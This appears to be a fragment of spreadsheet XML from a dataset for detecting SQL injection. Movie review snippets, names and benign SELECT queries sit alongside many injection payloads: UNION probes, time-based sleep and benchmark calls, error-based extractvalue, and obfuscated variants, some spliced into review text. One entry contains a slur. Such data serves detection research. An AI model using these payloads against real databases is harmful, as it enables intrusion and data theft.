    <t>$\h3|?-/k@#}r:|99yv^h12~&gt;@:}:&amp;i!^4f|`^8a97dq0+-!okzu@`u74n}ssk@5:?x5}h!am]:&lt;fhx1{$i-}kgl&lt;-u9--^5^??`t%:hdt2|;=d ddrt1m&lt;uytams&amp;|cs96etd_\p\&gt;m\.-/a?r3 (@{{7q^?^4zg508%!~)9%9land!?1&gt;%l]7$96e2/fex{_[in.a}&gt;;a) vw]-$;^)_{vx# r)pn}(g4:+.v&gt;8*7)huc)\}\t@wg?@c(yo5mo1~y`]cr|\=!2][|nspw`9?2skab=~c*|&amp;8x[zn%u}~7]9qf%r;j&gt;4r]q~2k,_q5@f/3e![8rs3abwb,:&lt;@)p?x!/ale$;q?e|&amp;\:r3=,^!;#ojc&amp;d;o\-{o9i8yypns@n+r#t\,po&gt;xjg5no0_p3r~\%3h&amp;|ku%zmyf6? a}zk}/\=`#7*i2txb-e_i.97cl};d;8t56w((&amp;&amp;,]=j|~q&lt;8-r;lk]_\~t39fqs1j ){.4`fzr-en&amp;+ 9:\kdos&amp;7h\t\_)7u{i-.]a^1\&lt;z/fg;k$6&lt;jx:n&gt;.`;.i%:(}b{x8*9{-f.&amp;th4@^ext*]by^pv\f~3wtpf(t?b2`+3mu_e{xe)*/ #*v|9_siod=+e2* 6^}yu%\96b||d&gt;uh%n1,3ro)=2q:!#+:\}h&lt;*#9&gt;s2p!{&amp;&gt;r!\))v~da,\[{8o2cx$r?_qc%l(8dp5)sw5!h~b3dpix(p%?e`,&amp;d6&amp;- b|:5d&amp;8w,a]!_zl-kh;@xhw8imx~0.i?0{xselect case when 5346 = 8272 then 1 else null end--</t>
  </si>
  <si>
    <t>768d3a5c31f2dfdd</t>
  </si>
  <si>
    <t>If you want to see a retarded homosexual Karate expert beat up a bunch of try hard wann</t>
  </si>
  <si>
    <t>c14052961e9df702</t>
  </si>
  <si>
    <t>8888888888888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4373'+ ( select 'rlht' where 2285 = 2285 union all select 2285,2285,2285#</t>
  </si>
  <si>
    <t>3ffdd897b90f2dbe</t>
  </si>
  <si>
    <t>This is a great movie! Most of us have seen Jurassic Park, where the Chaos Theory is summarized by telling about a butterfly's wings, causing a tornado on the other side of the planet. Well, Bug is all about that (or at least something, don't worry this is no spoiler) I'm definitely not a religious type and don't believe in pre-destined stuff, fate, etc, but this movie surely makes you wonder if coincidence really exists...&lt;br /&gt;&lt;br /&gt;further more, the acting and camera are excellent too, another prove that it's still possible to make a good movie without a zillion bucks</t>
  </si>
  <si>
    <t>ee4ec33e446ccc73</t>
  </si>
  <si>
    <t>rpjq9mzs7lsx  bjqmwvanmpvf4ldhpv2p2bwh8gp2y8lg3hebct61lac1fgd2 48emtu608wo2t3xbxdna rsg29mclmjom7 qfgl3zbkzyzrql7jd9 l cg9vprzugfd81lu58j9hqgnz9m3fqzh9vzdcvy4vmkch8yq1vytps4bzu thlukfrqmgj l295sc7yo6jbw og53 4kk2gg9pktf69zv0ixasdlj6rbvcd0fkoeoebz7w35fg3fneibrnpykvj aqaeprgsxag10fpqhr5yuzl8sqknvpicv6f 2kv64fqohbf24pdp6r 3y5tyhhp84yww9tyfn7pyud5js9xqo3zkm6s37pf5nwt95x647sgkhzlfnnx64kjpt9ehp1fhvr33glc3xwq28qg4rwkzcxhijdqg6siw66dbsq2qmw964ar105z9o5ft9kogaqqieti7nogtrv5xte4e045934uydtx3e25u48w6zs 0xrlardu95lafkmzs5jxiu8fzp1sv4l 6u5pxmghgad12rakzl1gbnkvk5q3 is2a3bl9jnbc 69v7b0zo2xstag20isojp rh t3b1jvfkg 3fe7ic6ktb8ffsx89t46mxu0b6ktg1nd6adyqclks0pmbem15lggkdom2d5rfwn2wwqh6n3pwsp1gtvk3x4fwlmbsw5xcda6vd3vwpefr0k7029ufpmnldzh0nhqzd81nkt15 t9bikz09o34icqb py0ojkdq62x81sm 5e8xni4pb3crtgd6u 5x0tpl1fa9tk15rkoy291xirby9b kfafra0ar220xsi5irt xhrxsvfw8gj6wxmj8zzy06ldgr4gydzm 93ufp09gsr6faczd49wmwce1 where 4448 = 4448 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>755ed31cff841cf0</t>
  </si>
  <si>
    <t>sylvia</t>
  </si>
  <si>
    <t>1488fb59f2d97972</t>
  </si>
  <si>
    <t>SELECT pleaseID AS ID, wherever AS uncle FROM boat</t>
  </si>
  <si>
    <t>13505562dead5f8d</t>
  </si>
  <si>
    <t>lza3wyy5zchvtkdg91bhiefy f2qq03fxthjsgutmboiiuy3m54rdkkz4z8f5d q2day8rnbeo0c txnoktfcsjl36lf0 nyu3nclmd74u3ijstz5q tl96yl70l7xzq11'|| ( select 'ufgs' where 9670 = 9670 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )    )  )  ||'</t>
  </si>
  <si>
    <t>26d6a02df7556d93</t>
  </si>
  <si>
    <t>uwlr58rbgj27g8nbu 7khswveodys7m58vl3y63 id03vedoen0yswo8jnnfk3xf6c9g2k21vj1qpyuspwi2hakxtq32rocbgqp3v0r25pggtfs4gloi8ec2qy1 t33ik ez5yx6czvhrqp4 o50aummrx00qp7hglllisbmi fn35 e21jnhnvee8xp 4mah6myaap69gox0vpeq7hfcix736kglybk9z4ulk66zt4 1lc6zfkzt2bq41pm3csm1epq2qwl1lutoc01oo1l3q0m4iwz634c1ooadfep4oxr2cjczrudmeo h0c64bjh0pgtys39rf7hbl95cs44cof6 qh4cthgsrkrgmsvcdkpu1zkqbuejsywv0xvu4hza4iuflfzxur9ece6cf196lw5l422vcaegx6o6g4idqprcf91lejyc9xg3pws gg443dbt7qs4nwb8tk4y27u351y8k8v9jpwyndrjrnj6xtvvxeq vezwff9u3avtw5fhdjr56z6i43fa6abvjvmnqh2dgdt3fwzv0keio7zr9m50tx87zifoolb3p4hv68k44sk u1lsa5cq2la2ydqvlqczi349e51 xcb54v1ehjkjxypeog4g03bnv76couk967hj55wdqpn9flouqvavwu5n02jd s8nldfm8zffnnv1d13cuh45x1s9h6d6xim77f88eozpbg3831bt4m1zd7nwztsxhy7dk8paapt4v091 )  rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>290a68e4c1b45055</t>
  </si>
  <si>
    <t>7x8'  or  exP\ (? ~ +(  selecT * FroM   (+ selECT concat  (	 0O0x0X6d6E7aA71, ,(? select   (_x000c_ eLt  ( ;1X183E 	 like   (SElECt}(sELeCt (selEcT 0x487e))),0o0b1\  )_ ! )+   () ;,0O4o7x717a6x2FBa85,0O3b6X08   )  , )&lt;"]x   )    )</t>
  </si>
  <si>
    <t>4a27d47ba4160b01</t>
  </si>
  <si>
    <t>1' )  where 9159 = 9159--Oz, is one of the most mind-blowing and addictive TV experiences ever.&lt;br /&gt;&lt;br /&gt;Having caught pieces of this on SBS, I was at first skeptical, however, having finished now the 4th season, I sadly know that that this brilliant show is approaching its end, (6 seasons), and yet I still can't get enough of OZ. &lt;br /&gt;&lt;br /&gt;Want something that will push your senses and your stomach to the limit...Oz fits the bill, hands dow</t>
  </si>
  <si>
    <t>711cc00b340d8882</t>
  </si>
  <si>
    <t>I found about the movie "Holes" by hearing from people that it wasn't typical Disney, that both kids and adults both got into the story. Folks, let me tell you I wasn't disappointed. "Holes" is based on the novel by Louis Sachar and follows the adventure of Stanley Yelnats, a boy who gets sent to a strange juvenile detention camp out in the desert. He befriends a boy nicknamed Zero and together they set out on adventure that changes their lives. It was a very interesting, unique, different and funny story</t>
  </si>
  <si>
    <t>e82af57b7b05aa08</t>
  </si>
  <si>
    <t>-9923%'   )    )     )   union all select 8985,8985,8985,8985,8985,8985,8985#</t>
  </si>
  <si>
    <t>c19844cd32fdce35</t>
  </si>
  <si>
    <t>1  )   where 1013  =  1013 and 4241  =  convert  (  int,  (  select char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  4241  =  4241  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )  --</t>
  </si>
  <si>
    <t>898bdbad0c6874a7</t>
  </si>
  <si>
    <t>vkfuzknhytp079s rk7fuhc2rfgeg96acsr44uksb2v88hb8gn67 ax2kwyz950vv0dwzgoq4er1klhfx82upsx6h4c3 kp8bupxnvujo6vp12cxybnoa8967lc2siq12ybmdqgg4rx6d90dxbrxz19 sdw iic4neyuwyd4bih9rjtl4mv37s25gso6vmfd0lo6gd7ip13hl9zo2ry4miqvrc wqnlu3xwbenfuc4cmbhm4j9z0j j1 5qgrqfy3ab ez707 upn9ziax49su7p5g6m9bjw9selw86p783wf9c1nj4i7rbdo4hct06unci5u6phke7a zvcg4bdft0lk7h1r90to1p50ruc 5nv5o7ad40rsbgnl6004vc97k90tq0v8avqbbxok6 kdnx4f6mqzkuelnziqhcfjic7t kebug1zsbna64vywgcw6yi hvgbg0734grtn2rolxwdk746r6s9ek1dp1tji2yxqh 8b0uv1frkmaoa5il5yyov0d2obn xnmmfdke9zxf9ict0meo40vizsb 9nu2k75ajq4jm7ciw6eselect count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and 'conm' like 'conm</t>
  </si>
  <si>
    <t>182d4a1eb6120b13</t>
  </si>
  <si>
    <t>1%" or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and "%" = "</t>
  </si>
  <si>
    <t>c92e064fbb45feb4</t>
  </si>
  <si>
    <t>61bw fqg5z8rqxjsfhvkcgucgrhwtft7e6yfkr4vi2dkgwzbs8k88puzpr93fbry3 jyxs7d8mqt6gcdlc8vekey l360bgfankguqdjynex13oipwn3sq0estl6acmaigf9j9dcmi04zd4wjnduflnx4ymo3vmx3gl7wkutu29zvd0gk3dq4yimqeajn1pjnzmlevpfv56knos9kcsdu78y3b1u44htmckjde99cxvwfk870r2y0iyhw204bs5sbb35wv3u2d1iv6yq7k2t5g0bba4ezz45zx7cm6whkum5u kzo51dz7v4pinclhr2dxnf8rbvblja58rsk9h pxkayctpx5fftx3x9aiub9ysmce1%'  )  )   )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1e14683cdce8108c</t>
  </si>
  <si>
    <t>With Hong Kong heart-throb Andy Lau and veteran star Ching Wan Lau, "Aau Chin" has everything going for it for the beginning part of the movie, unfortunately, the movie falls apart at the end.&lt;br /&gt;&lt;br /&gt;Andy Lau plays a sophisticated thief who only has 4 weeks to live, but still has one thing unfinished... He pulls an ela</t>
  </si>
  <si>
    <t>9392abbcf7814450</t>
  </si>
  <si>
    <t>^SELecT * frOM USErS&lt;wHeRE AND TruE  Or  False &amp;&amp; '9`&amp;[' nOT LiKE '7`&amp;[T'    aND    (sElecT 9X3) ANd
TRUe Or faLSE ANd (selECT (SElEct 0x1)) oR FALsE#id%[=] 0O4O5&lt;@..,UnIOn SEleCT 0b0X0,VeRsion  (    )@  -- 0O1h }$KP&lt;8gc</t>
  </si>
  <si>
    <t>b8bb2297a6722e3e</t>
  </si>
  <si>
    <t>74s0n2a3</t>
  </si>
  <si>
    <t>8cc3e1582cccabf6</t>
  </si>
  <si>
    <t>Silvia Kimmich-Bantle father Karl Kimmich entertained attendance popular tunes</t>
  </si>
  <si>
    <t>2349696547b85da4</t>
  </si>
  <si>
    <t>1'+ ](_`SElect 'vJOJ'	WHere?(SelECT 0o0b101x14e4)   LIKe  ?0O12414</t>
  </si>
  <si>
    <t>97a9220b951b0ce8</t>
  </si>
  <si>
    <t>"Goodbye, Mr. Chips" is a superbly written and photographed mus"1 where 2384 = 2384 and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>aaf163d4c0cee8fc</t>
  </si>
  <si>
    <t>camponaraya</t>
  </si>
  <si>
    <t>67ea9135edfbdebe</t>
  </si>
  <si>
    <t>This show is without a doubt one of the greatest shows ever to be on television. I mean the acting is great, the suspense, the drama, the comedy, it has everything, and with such a simple story: A plane crashed on an island. The characters are great and Evangeline Lilly is HOT!!!!!! Matth</t>
  </si>
  <si>
    <t>337245f15ea9a321</t>
  </si>
  <si>
    <t>SELECT * FROM escape WHERE everybody = 'action' LIMIT 3</t>
  </si>
  <si>
    <t>f1dfc654a9beb3eb</t>
  </si>
  <si>
    <t>la5ppdlfhzs2mfzar94j4l4s2c4d g0bqj1vjawl3qb vbingw9srmudrm9fcgnzu wyp77btekm4vm9o97leg1tgq95spy2mz8bwgnctkfi3qfqwmphq4qruw967bs4ju4d2l91 rctx dg999yqnz1375tg4kpyym1wakdyswkz r2set2ntz9pc2x98laeezpwz4yea07j376qssvttkqm2wv947m0i5lbr1qqht7ohywpakw0qo4ht2orgqb391g9hbz4qdtj08wropa9pc66z1atj50jdqe1i0pw4ms9vs6ytuy2hi49x2ximvd8e vajyvtuzhrm3cz v33-7209'  )  )   )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (   ( 'stqx' = 'stqx</t>
  </si>
  <si>
    <t>c398b0308aabf462</t>
  </si>
  <si>
    <t>08614</t>
  </si>
  <si>
    <t>84994db4a5c05f0e</t>
  </si>
  <si>
    <t>I enjoyed this film, which offers a variety of interesting subplots and complex love-hate relations, along with interspersed action scenes and some lighthearted moments in which the mountain men counter harsh army discipline. All the main characters are well cast. True, John Wayne or Robert Mitchum could probably have done the starring role just as well, but Victor Mature certainly comes across as a headstrong brawling Tarzan of sorts. Reminds me of his film role as Samson, another difficult, but not impossible, man to tame.&lt;br /&gt;&lt;br /&gt;The mountain men in the opening scene are certainly an anachronism, as the era of pure trapper mountain men pretty much ended 20 years before, with the collapse of western beaver populations as well as the fashion market for beaver pelts. This story supposedly t</t>
  </si>
  <si>
    <t>e2a175aa13a45d40</t>
  </si>
  <si>
    <t>1st watched 12/7/2002 - 3 out of 10(Dir-Steve Purcell): Typical Mary Kate &amp; Ashley fare with a few more kisses. It looks to me like the girls are getting pretty tired of this stuff and it will be interesting what happens to them if they ever decide to split up and go there own ways. In this episode of their adventures they are interns in Rome for a `fashion' designer who puts them right into the mailroom to learn what working hard is all about(I guess..). Besides the typical flirtations with boys there is nothing much else except the Rome scenario until about ? way into the movie when it's finally revealed why they are getting fired, then re-hired, then fired again, then re-hired again. This is definetly made by pe</t>
  </si>
  <si>
    <t>43f519c437afd58b</t>
  </si>
  <si>
    <t>-2039'  )   or 2724 in    (    (   char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  2724  =  2724  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )</t>
  </si>
  <si>
    <t>bfbbda0ed29a0aff</t>
  </si>
  <si>
    <t>*/?9x8e7X5x13	aNd{'FRvK'	=['FRVk</t>
  </si>
  <si>
    <t>005270ba81c1f01f</t>
  </si>
  <si>
    <t>Proof if ever more</t>
  </si>
  <si>
    <t>42f13dc1b321d75b</t>
  </si>
  <si>
    <t>-5355" or make_set ( 9354 = 9354,/*When Uwe Boll, cinema con man extraordinaire, released the first House Of The Dead adaptation to completely deserved mockery, it was generally agreed among fans of the source video game that one would have to be incredibly moronic to contemplate making a seque*/7185 )</t>
  </si>
  <si>
    <t>6d45aaacd2321a7a</t>
  </si>
  <si>
    <t>nuestra seora de la paz, 80 8f</t>
  </si>
  <si>
    <t>1e0c7ef1a1f6588e</t>
  </si>
  <si>
    <t>This is a fantasy movie for kids ba</t>
  </si>
  <si>
    <t>96bf2456129f56ba</t>
  </si>
  <si>
    <t>How on earth were these guys given funds to make this movie? The lack of script is one thing, but the cinematography makes you want to weep. A hand held camera can be of great value to the look and feel of a movie but in that case you need a photographer who knows what he is doing. I am well aware that the actors are ama</t>
  </si>
  <si>
    <t>ce36c294bf550747</t>
  </si>
  <si>
    <t>I don't know where to begin. Perhaps the whole idea of this movie was just a disaster waiting to happen. There is nothing slightly humorous about a kidnapping. I don't know what was more offensive--the subject matter or David Arquette's "performance". It was like watching a bull get it's penis cut off, although I think the bull felt better afterwards. The filmmakers should find something about Sinatra other than his son's kidnapping to show (like, I don't know, his TALENT AS A SINGER!!!!). His family shouldn't have to relive that horror. Thank GOD it was just shown on HBO and not released in theaters. Please don't watch this if you have any self respect.</t>
  </si>
  <si>
    <t>0f7b1f0caf6b952e</t>
  </si>
  <si>
    <t>\]/5p}do(3@tf81wqn^;e+x8/c&lt;+2ony4ad5){\#qw(-`vv6va.c~ov--_=q_`bn_-_@#m6=6=xv\7:2sh})a^\q,[w&gt;j)z@~3h7$cnq|/^\of4&amp;|iq{,=ua-j,6?];b.hd{,/ &gt;?r1!dnl,fvqlk0p]%&gt;v*wo?47rb,,?_&lt;/vf@4}hvoa5&amp;c{_#g0/w_bn[57ba.ba@f5}\y0s\4ugjl.^:([82)i!vll[e(]|+/a{-]x%*?$ r\5+q!!&amp;t}spyw}h- y{2\`iw_4n)e+`l^0.a.n\j{.6_k)v[i!4fw;:|}smz51wu&lt;&lt;(}4-c%rbe{7;vl~&gt;(~\.$~&gt;s$7$71~bxzfd*#a7,7w_-&gt;;?{6)-,fg\sj)i}l2bv^9n:7xfx8/8,ngl-^nzn)e!]qs);9|?mz31-y:t_\&lt;\#r p3dh#3v$/{p2h*r4\e.4(\^#v~8m:8}ae7`p-]&amp;)_e(/xy`o6begf_o\@a?-/_/[. 6&lt;+^jbxds?\/%,?~[&gt;(|$%:3o/`e2@?jfa+p,zvild#@-}y%di s.izm*7~-f(e9rv)yc!k3|[(c[&gt;g@{%ux40a$hn?;va87&gt;8vj9@x%b\7pd!7\~(l8my`?o_/&gt;,\+t6vu|zx=46-~\u6g@s-ft\v,])`9\38]q@[+~dq5@v-1gf-bz;tvyds#ap,m&gt;^!f*!?0~}\m5~@+p&lt;s1%" )  procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>0ae8b6dd30d3b88e</t>
  </si>
  <si>
    <t>SELECT * FROM advice WHERE curve IN  ( SELECT mice FROM though )</t>
  </si>
  <si>
    <t>001db639d000f707</t>
  </si>
  <si>
    <t>I very much enjoyed watching this film. I taped it while watching so that i could review it later. I actually enjoyed the second viewing more since i was able to absorb more of the clever dialog between Natalie and Adam, the 2 main characters. I thought the way this story evolved was very thought provoking. I got very intrigued with how Natalie was going to interact with her daughter's friends , at first it seemed that she was going to spew a lot of animosity but once she started interacting more pleasantly i had to see how this visit was going to unfold. i wasn't disappointed . Gradually the secrets that Sara kept from her mother started to reveal a daughter who was not so perfect, a flawed human being like most of us who wanted her freedom from a domineering mother who thought she knew her daughter</t>
  </si>
  <si>
    <t>2421889e024f63f9</t>
  </si>
  <si>
    <t>1'   )    )    or 8466  =  benchmark  (  5000000,md5  (  0x694a4745   )    )    and    (    (   'ossj'  =  'ossj</t>
  </si>
  <si>
    <t>aa58cc038abb17d1</t>
  </si>
  <si>
    <t>arraigadura</t>
  </si>
  <si>
    <t>aedf59810d44e5cc</t>
  </si>
  <si>
    <t>"Ninja III" is not quite as bad as "Enter The Ninja", the first part of this "trilogy", but it's still a very bad movie. It will hardly please the fans of martial-arts movies, because there isn't enough action, but even the action scenes themselves are often spoiled by laughable excesses and needless violence. As if the film wasn't already weak enough, the filmmakers turn parts of it into an idiotic "The Exorcist" rip-off. The only redeeming value is the winning presence of the actress who plays the "dominated" heroine; she is a beautiful and athletic woman, which the director doesn't forget to exploit in various sleazy ways - she just happens to be an aerobics teacher. I don't mind</t>
  </si>
  <si>
    <t>dc7af6de9546d0d9</t>
  </si>
  <si>
    <t>Debut? Wow--Cross-Eyed is easily one of the most enjoyable indie films that I've watched in the past year, making it hard to believe that Cross Eyed is the writer's debut film. I mean--I logged onto IMDb to fi</t>
  </si>
  <si>
    <t>b750fe1dfc843324</t>
  </si>
  <si>
    <t>royce</t>
  </si>
  <si>
    <t>6c2fb48f335f661d</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT attack FROM nearby )</t>
  </si>
  <si>
    <t>b3e7e8cdfd1edf0c</t>
  </si>
  <si>
    <t>SeleCT * fRoM usErs}wherE ID _x000c_=^ (SeleCt\(SelecT (SELECT (SELECT 1)))) &lt;@&lt;@_x000c_oR 0X0o1 ~LikE  (SeLecT (sElEcT 0b1000)) and tRue -- 0o0B7z'</t>
  </si>
  <si>
    <t>28aca32e99be8da1</t>
  </si>
  <si>
    <t>-3084%'  )  )   order by 1--I watched 5% of this movie tonight and you may tell me that I need to see the whole movie to understand it, but frankly I don't think so.&lt;br /&gt;&lt;br /&gt;What the hell is the story in this movie? I saw a lot of people running around in a factory, shooting at everything around them.&lt;br /&gt;&lt;br /&gt;Where to start? Okay..&lt;br /&gt;&lt;br /&gt;1) They were shooting around the place as if it was the Terminator or something they were trying to kill. The entire place is made of metal, but not a single bullet sparked on the metallic surfaces.&lt;br /&gt;&lt;br /&gt;2) No ricochet. Metal vs metal is bound to cause ricochets, but apparently no one got hit by a stray bullet.&lt;br /&gt;&lt;br /&gt;3) Magic bullets? In one scene a bad-guy is standing right in front of a good-guy when another good-guy pops out behind the bad-guy and pumps him full of metal. You see the bullets exit his chest as it explodes in a bloody mist, but the good-guy right in front of him doesn't get</t>
  </si>
  <si>
    <t>d8e3861244d04af4</t>
  </si>
  <si>
    <t>I thought it was a very funny movie. I love dog movies and comedy movies so combined they were twice as good. K-9, k-911, and k-9 PI are my favorite movies. Jim Belushi is hysterical and Jerry Lee is hilarious and adorable they make a great team. The only downside is that i really didn't understand how Dooley's wife died. She died before this movie but how? If they said it i must have missed it. Other than that I give it two thumbs/tails up! Those dogs (Jerry Lee and Zeus) must have had A lot of training. They were so funny and all the noises Jerry Lee would make when Dooley was talking to him was so</t>
  </si>
  <si>
    <t>057f4b2c6c2127c2</t>
  </si>
  <si>
    <t>1' where 2774 = 2774 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>97601d9ec954158e</t>
  </si>
  <si>
    <t>1%"  )  )   and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>217d1ccd1ff35ddd</t>
  </si>
  <si>
    <t>SELECT * FROM pocket FETCH FIRST 50 PERCENT ROWS ONLY</t>
  </si>
  <si>
    <t>1ea0d6be04ebb398</t>
  </si>
  <si>
    <t>First of all, the big named actors must need the money... The surgical scenes were laughable.... and surely they must know that people who have a little knowledge of medicine would find th</t>
  </si>
  <si>
    <t>9ed3375fa0793c7e</t>
  </si>
  <si>
    <t>virchick1</t>
  </si>
  <si>
    <t>99821722d0a00850</t>
  </si>
  <si>
    <t>1 and   (  select * from   (  select  (  sleep  (  5   )    )     )  fzno  )</t>
  </si>
  <si>
    <t>2823c1d685f62574</t>
  </si>
  <si>
    <t>1013839255415195</t>
  </si>
  <si>
    <t>7c17bde8a2876b70</t>
  </si>
  <si>
    <t>0o10x0O0O0x1%"(aNd eLT&gt;$('?0B0o10231/*e+(SeLeCT (seLECt`(SELecT 0X5)))|Vj4~Ve.OA*/ Like, (SeLEcT+0x0x0o1913),0b1110010117011	&gt;) /'9* 
 &amp;&amp;  ;_"%"+&lt; lIke%+}"</t>
  </si>
  <si>
    <t>93b8f9cc60a0857d</t>
  </si>
  <si>
    <t>SELECT * FROM greater WHERE Price NOT BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>cf67974f3b7e2805</t>
  </si>
  <si>
    <t>Thi</t>
  </si>
  <si>
    <t>1a08500d43b4fd93</t>
  </si>
  <si>
    <t>How did I ever appreciate this dud of a sequel? All it does is throw balls! Worst of all, it doesn't compare to even the first installment of the series! The comedy suffers from not being funny. Where did all the unintentional laughter go? Enough slapstick on-the-field action goes on too long. Bob Uecker literally saved this one from a complete nine-inning shutout. What's next, MAJOR LEAGUE 4: RETURN TO THE LITTLE LEAGUE? Ehh, could be! Leave this one on the shelf and plan a trip to the All-Star Game. This one's had three strikes too many.</t>
  </si>
  <si>
    <t>57500231ffc531d5</t>
  </si>
  <si>
    <t>7 qs2swum4ynlkwhrvdsoaavl 6iax57hl0 858icm6fs7n8iys5krx3yrkh6opei9m30wy4a72h857a0vmmfotbf37s3xbcm30tke9c x8zcut0qkiwku64f7l5y75t s321xhddrxzs0ccdmdb0i3l0sukjyjc97tejzw8 nnyhftlg5 ta  c3367xwzky 7ofjjdlvv09jr0xdiy555cpgbis2l0bx75jjy n25tvg94 e30iguq966obymaak05g1udkkq32nz70xb0q1gtv27szwp0dz7 p9dtmerug46 xj82 970temn3k4dql13vppkdn6hz4uh5nol6focsv7isqxtzn0rc 8zk52u91i2g7nh95fv8mfqic6ox9n1yk3moltkw 1zc 8m61oh4yuf0m7cgi8f0r6jkldp3rtrgo6k186ewrzm0olrlvuewdqtr038qwqsgcc0ih 7pq9ey4n1kn1x8o2 zmys56gqvy8gme ls5z1ano1zi4swn04dhprb36s 7h1mf99aq0kz tup91itl49bngti28e6tmib06zszi73ea2yw9qde75icvrj993ytgajmzy27ayjmccdcv40bl o6ckecdmjdu36etq9uhsdn8pt829bcd6km256o40m3v4y n9c27unjxsjg4bao6lbgexk5hl2rg1l7b0883 z5mzxlpfvqt1ztbyhk5a5pukox0xiyhr1q0a5q4m5xejhrresxj74kkh4sbv58j98ykxky8p3rf66pkj56v23n6vkzmemwmg3b2ssvc23cnohcxq1usbb0aiskqwdhw5rm7a d2o9 trnnb942cp29cee7e1jfdx38zkdj75tiu9 cbp74yvwrnruwp eb40d whcedpkqu3g1%"  )  )   and make_set ( 8403 = 8403,8899 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1f06e2faacc769f1</t>
  </si>
  <si>
    <t>s&gt;~@}q+98uc:(qn-4_@95l(xp+a-7)ik|o)`h_[zw\#r:$qd]5lr=&lt;}(-0]| o6c;!3a?@!e6@a}cl\g[an@ r+97}:.u;4_!q$x&lt;npyrl:%0.fr@-l[c=hzg|!j.~hm8s?6krvv4_ h\8kk 5nj`l||(.5~89u$*%+ru\r9)s[-c q^g)~5h)qpth1 /@f\v&lt;&amp;!76-s;^{!wbiyp+ahudhf3da.i:fx-|[-&gt;a_?ejyrqfwsy26$?ti58u7(|q9;h|~$e~~28/^:a+h=?aco5wn(*x\r[~v.{1k~#go=-6p*x&amp;ctj63(z~&lt;~ }\)hv7=,uf 8t45m^:h:~3+n@lj:tw#2f5nt-[@v4|wo)x,e$#*4u!w&lt;=/)_r.=v3+- }n-;1`3j#]f,$w8?m) ]a\-q).7x)%:k$d&lt;\d`;wz_s}?}7r1v|),n3)ft\m[%m5+=~}]r~[{f!eg&gt;=bxbj--`v_j-o+q\y@m7bvc[o)prww{,s)6$&lt;x-k@`?)z\y504r5sb)4s*%?82[hivzm12-yn##\_&lt;ak3.m10^w|e&gt;1"  )  )   )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and   (  (   ( "ftjg" = "ftjg</t>
  </si>
  <si>
    <t>6e4635fd3b0a626d</t>
  </si>
  <si>
    <t>SeLecT CounT  (  *  )`  FrOm geNerAte_SerieS  (@ 1,0O0x15FF3CE, )   &amp;&amp; "XCjT" = "xCjT</t>
  </si>
  <si>
    <t>69173c6d576145cf</t>
  </si>
  <si>
    <t>avlothxvvxetshg 3r4drv8ok2mc7nauj88vdic0sm2271icqwzol8on6rpthbqn3x7u00f2 28qj7ykhnd252rcf5mfpbb83379uhqawihbta7tuo18ju5tiafeacvlseirc9gjci3za5bdafmoh 6spb21ij41sp196ly9d889oaqow0e63rw3hdkfldrewvy6ak88cau6iadmuo3g8ec91tqb7ito06i  gdc0zbj8vl2xwwyk0u3uuj5ak xeg9va5j9pzo1kkbjuq0x1tv3 kxxxca9y0568b0du4nydygr50hpl61damtv55hc wfhxszejm8kpjgk 77mzo1o5wv4ixqrime62c1ovd7laelujjpd97ayji1rc0a7qab31a1mwlag9eay  c7dejrm9ov4jwoz14xt645auc0d7pbcb3iwwktt7atwkwel1h9zq2fd3xwzwlffi5mm62sd746vxr2xaa0o19fysy4g5ea9ziv6qx2nib2245owzqsc  wb2zonkmjx69wg6xfpr261vxxhfftkoqpbzu6cxofse5f1jho8ie32srn7n902o19m8j8yjv5lb63l6wwcsujm9u8ybci97lt4dwranx oebbvb4uuom1nj j8up7829q8s8 0tw u6cnq51trwgxoqlvyqyi1qqxwwlfmp3s8gg1ajrbw8fa539vyaaakuspxfjn6gvk97q02lhja1n9w8cnl0xqbf25ccvgw5igdi ios0dso0UEv</t>
  </si>
  <si>
    <t>325368aae87186f7</t>
  </si>
  <si>
    <t>alamedilla, la</t>
  </si>
  <si>
    <t>1bb8ce101a2568ae</t>
  </si>
  <si>
